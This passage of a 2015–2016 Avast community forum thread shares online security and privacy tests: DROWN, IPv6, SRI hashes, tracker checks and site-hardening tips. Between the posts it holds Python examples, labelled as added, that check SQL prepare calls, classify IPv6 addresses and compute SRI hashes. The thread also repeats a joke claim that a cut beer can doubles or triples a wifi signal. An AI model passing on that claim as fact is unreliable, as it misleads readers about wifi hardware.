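Added example. The rules and messages are assumptions modelled on the
issues the post quotes, not the real tool's source.
"""
from __future__ import annotations

from typing import Sequence

VALID_FLAGS = set("isdb")   # mysqli bind_param types: int, string, double, blob


def scan_sql(sql: str) -> tuple[int, int]:
    """Return (placeholders, statements).

    Counts '?' placeholders and non-empty ';'-separated statements, both
    measured outside quoted literals, so a '?' or ';' inside 'text' does
    not count. Literals may use backslash escapes (\\') or doubled quotes ('').
    """
    placeholders = 0
    statements = 0
    segment_has_text = False   # did the current statement contain anything?
    quote = None               # quote character while inside a literal
    i = 0
    while i < len(sql):
        ch = sql[i]
        if quote:
            if ch == "\\":
                i += 1                         # skip the escaped character
            elif ch == quote:
                if i + 1 < len(sql) and sql[i + 1] == quote:
                    i += 1                     # doubled quote stays inside
                else:
                    quote = None
        elif ch in ("'", '"'):
            quote = ch
            segment_has_text = True
        elif ch == ";":
            if segment_has_text:
                statements += 1
            segment_has_text = False
        elif ch == "?":
            placeholders += 1
            segment_has_text = True
        elif not ch.isspace():
            segment_has_text = True
        i += 1
    if segment_has_text:
        statements += 1
    return placeholders, statements


def check_prepare(sql: str, flags: str, variables: Sequence[object]) -> list[str]:
    """Return the list of issues; an empty list means the call is consistent."""
    issues = []
    bad = sorted(set(flags) - VALID_FLAGS)
    if bad:
        issues.append(f"Invalid flag(s) {''.join(bad)}. Only use i, s, d or b.")
    placeholders, statements = scan_sql(sql)
    if len(flags) > len(variables):
        issues.append("More flags than variables")
    elif len(flags) < len(variables):
        issues.append("More variables than flags")
    if placeholders < len(flags):
        issues.append("Less placeholders (?) than flags")
    elif placeholders > len(flags):
        issues.append("More placeholders (?) than flags")
    if statements > 1:
        issues.append("Multiple statements: mysqli_prepare() accepts one statement")
    return issues


# Constructed sample: the literal inserts from the post, with the flags "isd"
# the post shows being checked against them.
LITERAL_SQL = ("INSERT INTO STATION VALUES (13, 'Phoenix', 'AZ', 33, 112); "
               "INSERT INTO STATION VALUES (44, 'Denver', 'CO', 40, 105); "
               "INSERT INTO STATION VALUES (66, 'Caribou', 'ME', 47, 68);")

# The parameterised form a prepare() call should actually receive: one
# statement, one '?' per column, one type flag per bound variable.
PARAM_SQL = "INSERT INTO STATION VALUES (?, ?, ?, ?, ?)"
PARAM_FLAGS = "issii"   # int, string, string, int, int
ROWS = [(13, "Phoenix", "AZ", 33, 112),
        (44, "Denver", "CO", 40, 105),
        (66, "Caribou", "ME", 47, 68)]

if __name__ == "__main__":
    print("literal statements:", check_prepare(LITERAL_SQL, "isd", []))
    for row in ROWS:
        print("parameterised:", row, check_prepare(PARAM_SQL, PARAM_FLAGS, row))
```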
Title: Re: Tests and other Media topics
Post by: polonus on October 14, 2015, 07:48:13 PM
Test to see if they’re tracking you, visit request.urih.com. Go to: http://request.urih.com/
40% of the trackers on this site could be protecting you from NSA snooping. Tell urih.com to fix it.

Identifiers | All Trackers
 Insecure Identifiers
Unique IDs about your web browsing habits have been insecurely sent to third parties.
Tracked e.g. by levelity.com (non-secure ID tracking).

To get likewise reports, install Tracker SSL extension in Google Chrome: chrome://extensions/?id=hgoabgkpjcbliklekfgepfdlmcnkjnao 

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 15, 2015, 03:46:18 PM
Coming to a place near you soon: copyright on JPEG images?
Next step copyright on sharing txt's? Read: http://www.engadget.com/2015/10/14/jpeg-copy-protection/?ncid=txtlnkusaolp00000589
Whenever you wanna do this, have it visibly inside the picture, add watermark and eventually a CopyRight sign,
so folks know it has DRM protection, else we are in muddy waters sharing copyrighted material we don't even know was
copyrighted in the first place. Nice project for bounty hunters to gain some extra money....  :o
And what about free jpeg that wanna be shared?

Good development DRM on anything to protect new sacks with old wine and vested interests?

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 20, 2015, 02:18:25 PM
Dear Avast Community Friends,

Did you test here: https://en.internet.nl/
My test results could not be excellent because my provider here has not yet migrated to supporting IPv6 next to IPv4.
I have an IPv6 address starting with "fe" (same fc-fd) unable to work with the public IPv6 Internet.
The situation of many globally now. Good thing is they do not expect any issues for me after the launch!
DNSSEC is OK. Also test here: http://test-ipv6.com/ (translate with Google Translate).

polonus
Title: Re: Tests and other Media topics
Post by: Secondmineboy on October 20, 2015, 02:33:33 PM
Got a full 0/10, our routers do not support IPv6 and I bet they still run with the original firmware.

I don't want to know how old they are anyway......
Title: Re: Tests and other Media topics
Post by: midnight on October 20, 2015, 03:22:28 PM
Test shows
Title: Re: Tests and other Media topics
Post by: polonus on October 20, 2015, 03:57:34 PM
Hi -midnight,

The good news has a good side and a darker more sinister side to it. Using IPv6 has a new quality as it is unique and stays the same and has a new feature that it can be used for location tracking. So more secure from one point of view, but easier for those that want to monitor your whereabouts all the time all of the time. Read about this novel use of IPv6 here: http://ip6.nl/location/

So the situation is getting ever better for the global players to do their thing, but harder for the individual to protect against certain aspects of what they do. ;) Have a nice day.

polonus
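Added Python example (not from this post or the one about the internet.nl result a few posts up) for the two IPv6 points made there: it classifies an address by scope, so a host whose only addresses are link-local (fe80::/10, the "fe" address mentioned) or unique-local (fc00::/7, the fc-fd ones) is shown to be unable to reach the public IPv6 Internet, and it recovers the MAC address hidden in a stable EUI-64 interface identifier, the property that makes such an address the same everywhere and therefore trackable. All addresses are constructed.

```python
"""IPv6 scope and interface-identifier privacy check.

Added example. The sample addresses are constructed; no real host is used.
"""
from __future__ import annotations

import ipaddress

LINK_LOCAL = ipaddress.IPv6Network("fe80::/10")   # "fe80" addresses: on-link only
UNIQUE_LOCAL = ipaddress.IPv6Network("fc00::/7")  # "fc"/"fd" addresses: private


def classify(addr: str) -> str:
    """Return the scope of an IPv6 address.

    Only a "global" address can talk to the public IPv6 Internet; link-local
    and unique-local addresses never leave the local link or site, which is
    why an IPv6 connectivity test scores poorly on a host that has only them.
    """
    ip = ipaddress.IPv6Address(addr)
    if ip.is_loopback:
        return "loopback"
    if ip in LINK_LOCAL:
        return "link-local"
    if ip in UNIQUE_LOCAL:
        return "unique-local"
    if ip.is_global:
        return "global"
    return "other"          # documentation, mapped, or otherwise reserved space


def can_reach_public_ipv6(addrs: list[str]) -> bool:
    """True when at least one configured address has global scope."""
    return any(classify(a) == "global" for a in addrs)


def eui64_mac(addr: str) -> str | None:
    """Recover the MAC address from a modified EUI-64 interface identifier.

    An EUI-64 identifier is the 48-bit MAC split around the bytes ff:fe, with
    the universal/local bit (0x02) of the first byte flipped. Because it is
    derived from hardware it stays the same on every network the device joins,
    which is exactly what allows tracking across locations. Privacy extensions
    (RFC 4941) and stable opaque identifiers (RFC 7217) do not expose a MAC,
    and for those this returns None.
    """
    iid = ipaddress.IPv6Address(addr).packed[8:]    # low 64 bits
    if iid[3:5] != b"\xff\xfe":
        return None
    first = iid[0] ^ 0x02                           # undo the U/L bit flip
    mac = bytes([first, iid[1], iid[2], iid[5], iid[6], iid[7]])
    return ":".join(f"{b:02x}" for b in mac)


def report(addr: str) -> dict:
    """Summarise one address: scope, public reachability on its own, leaked MAC."""
    scope = classify(addr)
    return {"address": addr, "scope": scope,
            "public": scope == "global", "mac": eui64_mac(addr)}


if __name__ == "__main__":
    # Constructed host: a link-local EUI-64 address built from MAC 00:1a:2b:3c:4d:5e,
    # a unique-local address, and no global address at all.
    for a in ["fe80::21a:2bff:fe3c:4d5e", "fd12:3456:789a::1"]:
        print(report(a))
    print("public IPv6 reachable:",
          can_reach_public_ipv6(["fe80::21a:2bff:fe3c:4d5e", "fd12:3456:789a::1"]))
```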
Title: Re: Tests and other Media topics
Post by: polonus on October 29, 2015, 07:26:20 PM
Here you can check your site for missing Google Analytics Tracking Code: http://www.gachecker.com/
The results for the Avast Forum site show that only Google Universal Analytics is being flagged, all others produce an x.
See attached image,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 30, 2015, 01:27:16 PM
Easy Wifi Boost
Follow the next steps to boost your wifi signal considerably:

Drink a can of beer or soda.
Cut off the bottom of the can.
Cut off the top likewise. Note! Do not cut all the way round. Leave three to four centimeters at the top.
Cut the can lengthwise.
Place the can over the modem antenna or router modem. Your wifi signal will either double or be even three times stronger.

Enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on October 30, 2015, 02:01:31 PM
Easy Wifi Boost
Follow the next steps to boost your wifi signal considerably:

Drink a can of beer or soda.
Cut off the bottom of the can.
Cut off the top likewise. Note! Do not cut all the way round. Leave three to four centimeters at the top.
Cut the can lengthwise.
Place the can over the modem antenna or router modem. Your wifi signal will either double or be even three times stronger.

Enjoy,

polonus
If you need more help, you'll find it here:
http://www.wikihow.com/Make-a-Wi-Fi-Booster-Using-Only-a-Can (http://www.wikihow.com/Make-a-Wi-Fi-Booster-Using-Only-a-Can)
(http://www.screencast-o-matic.com/screenshots/u/Lh/1446213726445-30955.png)
Title: Re: Tests and other Media topics
Post by: polonus on October 30, 2015, 02:09:34 PM
Knew you liked this one, bob3160, just knew  ;D

Damian
Title: Re: Tests and other Media topics
Post by: DavidR on October 30, 2015, 03:26:15 PM
Easy Wifi Boost
Follow the next steps to boost your wifi signal considerably:

Drink a can of beer or soda.
Cut off the bottom of the can.
Cut off the top likewise. Note! Do not cut all the way round. Leave three to four centimeters at the top.
Cut the can lengthwise.
Place the can over the modem antenna or router modem. Your wifi signal will either double or be even three times stronger.

Enjoy,

polonus

Use cans of extra XXX strength beer or cider to enhance the effect ;D
Title: Re: Tests and other Media topics
Post by: bob3160 on October 30, 2015, 04:28:38 PM
Easy Wifi Boost
Follow the next steps to boost your wifi signal considerably:

Drink a can of beer or soda.
Cut off the bottom of the can.
Cut off the top likewise. Note! Do not cut all the way round. Leave three to four centimeters at the top.
Cut the can lengthwise.
Place the can over the modem antenna or router modem. Your wifi signal will either double or be even three times stronger.

Enjoy,

polonus

Use cans of extra XXX strength beer or cider to enhance the effect ;D
XXX strength would result in WiFly not WiFi
Title: Re: Tests and other Media topics
Post by: DavidR on October 30, 2015, 05:34:28 PM
Easy Wifi Boost
Follow the next steps to boost your wifi signal considerably:

Drink a can of beer or soda.
Cut off the bottom of the can.
Cut off the top likewise. Note! Do not cut all the way round. Leave three to four centimeters at the top.
Cut the can lengthwise.
Place the can over the modem antenna or router modem. Your wifi signal will either double or be even three times stronger.

Enjoy,

polonus

Use cans of extra XXX strength beer or cider to enhance the effect ;D
XXX strength would result in WiFly not WiFi

Just been reading an article in UK MicroMart magazine about LiFi being the next major development the Li part is about the Light Spectrum being infinitely greater than radio band. Even works underwater better than radio waves. Unfortunately it is still years away.
Title: Re: Tests and other Media topics
Post by: polonus on October 30, 2015, 10:12:30 PM
To make your own Tor Ban List combine IP info from the Tor Node List https://www.dan.me.uk/tornodes (refreshed every 30 minutes) and then search on ExoneraTor what is out there and whether to block.
So we have found 100.36.126.180   0FAA299792826179730905EB8A33905AB52B48B1   anothermiddlefinger   No
For current threat events look here: https://cymon.io/100.36.126.180
Reporting sources: pbl.spamhaus.org, zen.spamhaus.org, dnsbl.ahbl.org, tor.ahbl.org
-pool-100-36-126-180.washdc.fios.verizon.net seems involved -> http://toolbar.netcraft.com/site_report?url=http://pool-100-36-126-180.washdc.fios.verizon.net
Another one here: http://toolbar.netcraft.com/site_report?url=107.141.170.82  = 
107.141.170.82|csra|443|0|RSVX|3407827|Tor 0.2.6.8|rjwin@acpressuretest.com  etc.

pol

Title: Re: Tests and other Media topics
Post by: polonus on November 01, 2015, 01:25:55 PM
Israeli Neural Network AV Deep Instinct will catch 20% more malware: http://www.technologyreview.com/news/542971/antivirus-that-mimics-the-brain-could-catch-more-malware/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 19, 2015, 05:44:18 PM
Test your Magento shop for Shoplift backdoor patch here: https://www.magereport.com/
The backdoor enables criminals to get to credit card info....

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 28, 2015, 11:49:21 PM
With me it won't work, but here are 5 ways to come and "block" an adblocker.

1. Blocking in a blunt way as Yahoo tested on a minor scale: https://www.washingtonpost.com/news/the-switch/wp/2015/11/23/yahoo-escalates-the-war-on-ad-blockers-by-keeping-people-out-of-their-own-e-mail/
2. Buy off ads with a service like Adieu: http://www.adieu.io/
3. Buy from Blockers like with Acceptable Ads by ABP.
4. Abuse root certificates like Lenovo did with a BHO from Superfish. This one backfired grand time, Superfish went broke.
5. A polite request to whitelist the site for the Adblocker used. Some reward the whitelisting user with a nice picture.
Like your teacher did at school when you had learned your psalm verses by heart  ;)
Yes some treat ads like a religion...  ;D

I still would not lower the adblock visors on all 5 mentioned counts as no-one has given a 100% guarantee that unblocked ads could come  completely malware free. So in order to go without mal-ads I block all.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 30, 2015, 03:18:47 PM
Just bookmarked this link: http://www.419eater.com/
and another one on scams: http://www.scamvoid.com/check/

polonus
Title: Re: Tests and other Media topics
Post by: Simion on November 30, 2015, 04:34:06 PM
Just bookmarked this link: http://www.419eater.com/
and another one on scams: http://www.scamvoid.com/check/

polonus

Hi polonus:

I'm "enjoying" your first link quite a bit, but your second link goes to a 404 Not Found error. Should be: http://www.scamvoid.com/
Title: Re: Tests and other Media topics
Post by: polonus on December 06, 2015, 01:47:30 AM
Nice bookmarklet to add: http://www.phpied.com/quirks-bookmarklet/  Code Source: Stoyan Stefanov
It will tell you whether or not the browser renders your page in Standards Compliance Mode or Quirks Mode. The bookmarklet will figure this out for the page as well as for all the frames (and their frames) recursively. Enjoy!

polonus

P.S. For your information the page you are looking at here is in CSS1Compat, but this message is BackCompat and cannot be seen!  ;)
Title: Re: Tests and other Media topics
Post by: polonus on December 08, 2015, 12:24:06 AM
Interesting search site: -https://crt.sh/? Enter an Identity (Domain Name, Organization Name, etc),
a Certificate Fingerprint (SHA-1 or SHA-256) or a crt.sh ID:
(% = wildcard)
Check for phishers that use free let's encrypt certificates here: -https://crt.sh/? Identity Search
See the Google Safebrowsing alert here: -https://www.electronicfrontierfoundation.org/
Before "let's encrypt" came in, was such a thing possible? Consider this safe entry: https://www.eff.org/

polonus (volunteer website security analyst and website error-hunter)

P.S. Another good search site for such abuse: -https://exchange.xforce.ibmcloud.com/url/cpe-198-72-160-0.socal.res.rr.com
(to go there use the address without the preceding -)

D
Title: Re: Tests and other Media topics
Post by: bob3160 on December 08, 2015, 12:34:02 AM

I even got a warning from Google in the email notification to this post:
(http://www.screencast-o-matic.com/screenshots/u/Lh/1449531084073-42777.png)
Title: Re: Tests and other Media topics
Post by: polonus on December 08, 2015, 01:04:18 AM
Hi bob3160,

Break your links in the quote, please, like I did, and that Google warning goes,

damian

Title: Re: Tests and other Media topics
Post by: Gopher John on December 08, 2015, 07:54:08 PM
https://isc.sans.edu/forums/diary/Patch+Tuesday+Warmup+Internet+Explorer+Sunset+and+Windows+XP+Embedded+End+of+Support/20459/ (https://isc.sans.edu/forums/diary/Patch+Tuesday+Warmup+Internet+Explorer+Sunset+and+Windows+XP+Embedded+End+of+Support/20459/)

Patch Tuesday Warmup: Internet Explorer Sunset and Windows XP Embedded End of Support

As we are waiting for the Microsoft Santa to slide down our Data Center air conditioning duct later today to deliver a delicious package of patches (did you leave some floppy disks and a can of red bull out for him?), we got a couple other announcements from Microsoft that should not be overlooked:

- January will be the last month Microsoft will provide updates for any Internet Explorer version other than Internet Explorer 11! Even Internet Explorer 10 will no longer be supported after January patch Tuesday (January 12th, 2016).

- Support will also end for Windows XP Embedded. This will also make it more difficult for other Windows XP left-overs that tricked their version to use the Embedded updates. But nobody should be running XP anyway (right?).

- Still running Windows 7 or 8.1 (sure way to stay on MSFT Santa's "naughty" list)? Rumor has it that with today's patch Tuesday, Microsoft may re-enable the auto-upgrade to Windows 10. You may flip the switch back to not update, but it will set itself to "on" once a day.

[1] https://www.microsoft.com/en-us/WindowsForBusiness/End-of-IE-support
[2] https://support.microsoft.com/en-us/lifecycle/search/default.aspx?=&alpha=Windows%20XP
[3] http://www.computerworld.com/article/3012278/microsoft-windows/microsoft-sets-stage-for-massive-windows-10-upgrade-strategy.html#tk.rss_all
Title: Re: Tests and other Media topics
Post by: polonus on December 14, 2015, 02:05:07 PM
Untraceable communication launched: http://news.mit.edu/2015/untraceable-anonymized-communication-guaranteed-1207
Code can be found here: https://github.com/davidlazar/vuvuzela  &  https://github.com/jlmart88/vuvuzela-web-client
With a network manager this cannot be safe. Just like the real Vuvuzela will produce, a lot of noise from hot air.....
The future is to go server-less: https://github.com/ricochet-im/ricochet
and another alternative for just the addressee: https://bitmessage.org/wiki/Main_Page

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 15, 2015, 01:46:48 AM
Detecting what Ghostery does and abusing it for ad-tracking....http://blog.securitee.org/?p=277
Some of the code mentioned in the reports seems also to disable Adguard protection,
I reported a beta test form to them..https://news.ycombinator.com/item?id=4907609

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 15, 2015, 02:16:59 PM
Some things to ponder on: http://www.nedhardy.com/wp-content/uploads/images/2011/may/huxley_vs_orwell_2.jpg

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 17, 2015, 04:45:40 PM
F-Secure launches free sandbox to test malware: https://labsblog.f-secure.com/2015/12/17/see-sandboxed-execution-environment/  &  https://github.com/F-Secure/see

polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 30, 2016, 01:28:54 AM
Back to actuality and worth to test your server against TLS Logjam: https://tools.keycdn.com/logjam
OK and upgrade and patch whenever one could implement.
Another test there HTTP/2 Test - a simple test to verify your server: https://tools.keycdn.com/http2-test
Results:
HTTP/2 Test Result forum.avast.com

Negative! forum.avast.com does not support HTTP/2.0. Supported protocols: http/1.1
ALPN is not supported. (Confirmed here: http://www.webconfs.com/http-header-check.php )

For a SPDY check go here: https://spdycheck.org/
For the forums here: SPDY Protocol Not Enabled!
Seriously? This SSL/TLS server is using the NPN Extension to tell browsers it supports alternative protocols, but SPDY is not a protocol it supports. The server is not making SPDY an option. Since all the pieces are in place, hopefully it will be easy to enable SPDY support with this server.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 31, 2016, 12:31:12 AM
No more dead links thanks to open source Amber plug-in for custom CMS: http://amberlink.org/

see: http://www.youtube.com/embed/25Kz7PqapG4

By the way always keep your CMS up to date, disable user enumeration and directory listing for WordPress etc.,
retire old and left code (zip-file for later reference) for jQuery libraries; harden your server software and
let your server software not "talk that loud", for instance via excessive server header info proliferation.
Cookies not flagged as "HttpOnly" may be read by client side script. Websites are at risk of a clickjacking attack when they allow content to be embedded within a frame.....

So stay safe and secure, and that is the wish of,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 31, 2016, 11:34:41 PM
Play these old DOS games in the browser from archives, like for instance: https://archive.org/details/msdos_Prince_of_Persia_1990
or Wolfenstein: https://archive.org/details/msdos_Wolfenstein_3D_1992
Sim City first code released: http://weblogs.asp.net/bsimser/simcity-source-code-released-to-the-wild-let-the-ports-begin
Stunts: https://archive.org/details/msdos_Stunts_1990   for the old style gamer.
etc. etc. Source article with more examples: Donovan Kerssenberg

pol
Title: Re: Tests and other Media topics
Post by: polonus on February 10, 2016, 12:28:20 AM
SRI Hash Website Scanner to scan any website for Subresource Integrity (SRI) cryptographic hashes.
For what it is worth, read the commenting article here: http://www.theregister.co.uk/2016/01/15/china_github_attack_defence_test/
link article author = John Leiden
We are safe here:
Site
https://forum.avast.com/index.php?action=post;topic=129271.330;last_msg...
Scan Date
Today at 12:26 AM
Status Code
HTTP 302 Found (Redirect)
Scripts
Found 0 unsafe scripts out of 0 script tags
Stylesheets
Found 0 unsafe stylesheets out of 0 stylesheet tags
Also read: https://frederik-braun.com/using-subresource-integrity.html

Enjoy, my good friends, enjoy, example scan: https://sritest.io/#report/04fc4b00-34a8-4b60-9c79-4031cd0c65e5

A Word-Press plug-in to automatically insert Subresource Integrity attributes: https://wordpress.org/plugins/wp-sri/

polonus (volunteer website security scanner and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on February 11, 2016, 04:09:01 PM
Website owners should seek to prevent their websites from getting attacked and compromised/abused/defaced etc.
Check here with Uptime Robot, it is for free: http://uptimerobot.com/#newUser

A few tips to prevent website hacks and defacements.

1. Always keep your server operation software and any other software that is running on your website up to date.
Know that attackers are known to abuse out-of-date or left software.

2. Hosting company management solution should keep you secure. Go for dedicated hosting. Whenever on shared hosting,
get to know your neighbors, else ask to be moved out on a different server.
Cheap or free bulk hosting will give you two rewards you do not want - security issues or performance issues.
The choice of a good hosting provider is the most important choice you may come to make.

3. With CMS and forum software apply security updates. WordPress should notify you whenever you log in.
Disable user enumeration and directory listing. Update (free) plug-ins and retire left code.

4. Always use parameterised queries to avoid risks of Standard Transact SQL.

5. XSS. Always ensure you check on data that are being submitted and encode or strip out HTML.
Use SRI hashed attributes, the solution came out of beta now. There is a free WordPress plug-in for it.

6. Keep your server and CMS software silent, do not let it speak out loud, keep your error messages vague.

7. Use an appropriate complex password routine, store them encrypted and salted.

8. Prevent direct access to uploaded files altogether, store them outside root or on a blob.

9. Have your database on a different server and your webserver as well, so it cannot be directly accessed.

10. SSL. It is a good idea to use it for personal data that could become corrupted.

11. Block automated script attacks. Use code scanning as an early warning system. We started this posting on that one.

12. Scan for typical exploit code.

13. Use DNS Blacklists.

14. Avoid PHP running as a module when allowing global write permission.
 
15. Critical websites should undergo penetration testing.

16. Protect sensitive data by putting them in separate files for config and data base.
Avoid client side checking with Javascript, it is insecure.

17. Implement automated backups for actual website and supporting databases.

18. Disable anonymous FTP on your server. Only allow access from outside via ports 80 and 443.

19. Avoid public PCs and Wifi Points to get access to your admin panel. Use a VPN.
Do not update your blog from the barber shop. It looks cool, however it is insecure practice.

20. Check your logs. Limit access to your resources. Use stronger passwords, and do not use default ones.

Info credits go out to authors from Decision Group and mafudge


polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 01, 2016, 05:11:29 PM
A new serious vulnerability has been found for the SSL protocol, named DROWN - Decrypting RSA using Obsolete and Weakened eNcryption - Read on it here: https://www.drownattack.com/
And test for it here online: https://test.drownattack.com/
So what attacks will await us next, we had POODLE, Heartbeat, HEARTBLEED, and now we have DROWN.
One-third of all HTTPS websites open to DROWN attack!

polonus
Title: Re: Tests and other Media topics
Post by: Secondmineboy on March 01, 2016, 05:13:29 PM
A new serious vulnerability has been found for the SSL protocol, named DROWN - Decrypting RSA using Obsolete and Weakened eNcryption - Read on it here: https://www.drownattack.com/
And test for it here online: https://test.drownattack.com/
So what attacks will await us next, we had POODLE, Heartbeat, HEARTBLEED, and now we have DROWN.
One-third of all HTTPS websites open to DROWN attack!

polonus

Bad news for us: https://test.drownattack.com/?site=forum.avast.com
Title: Re: Tests and other Media topics
Post by: bob3160 on March 01, 2016, 05:20:34 PM
A new serious vulnerability has been found for the SSL protocol, named DROWN - Decrypting RSA using Obsolete and Weakened eNcryption - Read on it here: https://www.drownattack.com/ (https://www.drownattack.com/)
And test for it here online: https://test.drownattack.com/ (https://test.drownattack.com/)
So what attacks will await us next, we had POODLE, Heartbeat, HEARTBLEED, and now we have DROWN.
One-third of all HTTPS websites open to DROWN attack!

polonus

Bad news for us: https://test.drownattack.com/?site=forum.avast.com (https://test.drownattack.com/?site=forum.avast.com)
(http://screencast-o-matic.com/screenshots/u/Lh/1456849248194-21647.png)
Title: Re: Tests and other Media topics
Post by: polonus on March 01, 2016, 05:46:21 PM
I go for bob's results, as they come confirmed here:
https://test.drownattack.com/?site=https%3A%2F%2Fwww.avast.com%2Findex
Quote
Results for com/index
We have not identified any vulnerable servers matching this name. It’s possible that our scans missed something, or that there are vulnerable devices behind your firewall. For such devices, we recommend using our client-side scanning software.

polonus
Title: Re: Tests and other Media topics
Post by: Secondmineboy on March 01, 2016, 05:52:16 PM
I go for bob's results, as they come confirmed here:
https://test.drownattack.com/?site=https%3A%2F%2Fwww.avast.com%2Findex
Quote
Results for com/index
We have not identified any vulnerable servers matching this name. It’s possible that our scans missed something, or that there are vulnerable devices behind your firewall. For such devices, we recommend using our client-side scanning software.

polonus

Theres a patch already released for SUSE and SUSE based systems :)

There are 3 patches released: https://download.suse.com/Download?buildid=urp9l5AblyY~

Just as an example.
Title: Re: Tests and other Media topics
Post by: polonus on March 01, 2016, 06:29:21 PM
Hope server admins will implement these, as I still see a lot of vulnerable servers around.
Also strange why a netcraft tool does not flag for DROWN attack.
Mind that the online test may just be an indication, there are false positives on detected servers
and clean servers that may be found vulnerable in the end.
Together with the cookies MONSTER your security, even with encryption - http://www.theregister.co.uk/2015/09/25/cookies_monster_your_security/
we have quite some insecurity of the protocol.

polonus
Title: Re: Tests and other Media topics
Post by: Secondmineboy on March 01, 2016, 06:33:31 PM
Hope server admins will implement these, as I still see a lot of vulnerable servers around.
Also strange why a netcraft tool does not flag for DROWN attack.
Mind that the online test may just be an indication, there are false positives on detected servers
and clean servers that may be found vulnerable in the end.
Together with the cookies MONSTER your security, even with encryption - http://www.theregister.co.uk/2015/09/25/cookies_monster_your_security/
we have quite some insecurity of the protocol.

polonus

https://blog.cloudflare.com/the-drown-attack/
Title: Re: Tests and other Media topics
Post by: polonus on March 08, 2016, 06:19:21 PM
Test a website for SRI hashes as here with a random example: https://sritest.io/#report/5c1788c0-9ac2-4832-9874-9fba8e76c4ca
And then in case of a SRI hash missing generate that SRI Hash: https://www.srihash.org/
Example:  [script] <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js" integrity="sha384-EaUkI/FiMJtEXWAl0dCczvbFvjfzsIF1UNKGJvu9p5JIG71Kih7/kQJvYbBL7HOn" crossorigin="anonymous"></script> [-script]

Enjoy, my good friends, enjoy,

Damian

P.S. on crossorigin re: http://docs.trackjs.com/tracker/tips.html
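As an added example (not from the post, nor srihash.org's code), this computes the kind of integrity value carried by the jQuery tag above and then checks a resource body against it the way a browser does, including attributes that list several hashes; the library body is a constructed sample.

```python
import base64
import hashlib

# Digest algorithms the SRI specification allows, weakest to strongest.
SRI_ALGORITHMS = ("sha256", "sha384", "sha512")


def sri_hash(body: bytes, algo: str = "sha384") -> str:
    """Return an integrity attribute value ('sha384-<base64 digest>') for a resource body."""
    if algo not in SRI_ALGORITHMS:
        raise ValueError("SRI only permits sha256, sha384 or sha512")
    digest = hashlib.new(algo, body).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def script_tag(src: str, body: bytes, algo: str = "sha384") -> str:
    """Build the <script> tag a site would publish for a third-party library.

    crossorigin="anonymous" is required: without CORS the browser cannot read the
    bytes it needs to verify, so a cross-origin script with integrity is blocked.
    """
    return (f'<script src="{src}" integrity="{sri_hash(body, algo)}" '
            f'crossorigin="anonymous"></script>')


def integrity_matches(body: bytes, integrity: str) -> bool:
    """Check a resource body against an integrity attribute the way a browser does.

    The attribute may carry several whitespace-separated hashes; only those using the
    strongest algorithm present are considered, and the body is accepted if any one of
    them matches. Tokens with unknown algorithms are ignored, and an attribute with no
    usable token at all imposes no integrity requirement.
    """
    usable = []
    for token in integrity.split():
        algo, _, value = token.partition("-")
        value = value.split("?", 1)[0]  # strip the optional "?options" suffix
        if algo in SRI_ALGORITHMS and value:
            usable.append((algo, value))
    if not usable:
        return True
    strongest = max(SRI_ALGORITHMS.index(algo) for algo, _ in usable)
    return any(
        sri_hash(body, algo) == f"{algo}-{value}"
        for algo, value in usable
        if SRI_ALGORITHMS.index(algo) == strongest
    )


# Constructed stand-in for a CDN-hosted library body.
SAMPLE_LIBRARY = b"window.jQuery = function () { return 'constructed sample library'; };"

if __name__ == "__main__":
    print(script_tag("https://cdn.example.invalid/jquery.min.js", SAMPLE_LIBRARY))
    print("tampered copy accepted:",
          integrity_matches(SAMPLE_LIBRARY + b"\n// injected", sri_hash(SAMPLE_LIBRARY)))
```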
Title: Re: Tests and other Media topics
Post by: polonus on March 21, 2016, 01:32:13 PM
Test your non-existent privacy on apps like WhatsApp just to be aware of it all the time you are online:
https://maikel.pro/blog/en-whatsapp-privacy-options-are-illusions/
AdDetector and AdNetworkDetector apps also give you a less intrusive insight of what you share with their servers and
with facebook that owns WhatsApp with a Saudi Prince as its largest stakeholder.
Privacy options do work, but probably not as the user intended, so as you are the product. ;)
It is a over a billion dollar business model.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 23, 2016, 06:54:02 PM
Worldwide OONI explorer shows internet censorship and network anomalies:
https://explorer.ooni.torproject.org/explore/
and https://explorer.ooni.torproject.org/world/
Example: https://explorer.ooni.torproject.org/measurement/qt5XiB0z4rf6gBQOJUXFQdSVv1Uzf0f8xwKmKAjLevbBK61c3dvXxgK3xwCdkU2c

enjoy, my friends, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 25, 2016, 07:22:24 PM
List of Certificate Authorities that Google does not trust: https://www.certificate-transparency.org/known-logs
One easy method is to visit your site in Chrome and then click on the green padlock, "Connection" tab and then look for text indicating whether the site is "publicly auditable".  If you see text showing that the site is, that means that your server is returning SCT responses to Chrome.  On some platforms Chrome will additionally display a link to view "Transparency Information".

pol
Title: Re: Tests and other Media topics
Post by: polonus on March 25, 2016, 08:33:47 PM
Chrome is predicting where you could go. Go here in the Chrome browser and see for yourself: chrome://predictors/
You see your whole prefetch history. This omnibox functionality could be somewhat of a privacy concern,
read here: http://jordan-wright.com/blog/2014/12/18/chrome-tracks-every-key-typed-into-omnibox/

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on March 26, 2016, 02:15:51 AM
Chrome is predicting where you could go. Go here in the Chrome browser and see for yourself: chrome://predictors/
You see your whole prefetch history. This omnibox functionality could be somewhat of a privacy concern,
read here: http://jordan-wright.com/blog/2014/12/18/chrome-tracks-every-key-typed-into-omnibox/ (http://jordan-wright.com/blog/2014/12/18/chrome-tracks-every-key-typed-into-omnibox/)

polonus
Strange that the article said that this setting was enabled by default ???
Here's my setting and I certainly haven't changed a setting I don't even know exists.
